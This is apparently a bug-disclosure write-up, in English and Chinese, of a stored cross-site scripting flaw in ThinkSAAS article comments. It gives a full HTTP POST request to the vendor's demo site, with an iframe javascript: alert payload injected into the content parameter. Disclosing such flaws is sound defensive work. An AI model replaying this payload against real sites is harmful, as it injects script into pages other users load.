存储型xss（需要注册登录）/ Storage type XSS（Need to register and log in）

[MIMAZHAN]

Storage type XSS（Need to register and log in）
When the article is published:
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421

Add an attack poc：<iframe src=javascript:alert('success');height=0 width=0 /><iframe> to the %2Fp%3E after the content parameter

Official return：https://demo.thinksaas.cn/article/show/395/

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

存储型xss（需要注册登录）
发表文章时：
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421

在content参数后%2Fp%3E添加攻击poc:<iframe src=javascript:alert('success');height=0 width=0 /><iframe>

官方复现：https://demo.thinksaas.cn/article/show/395/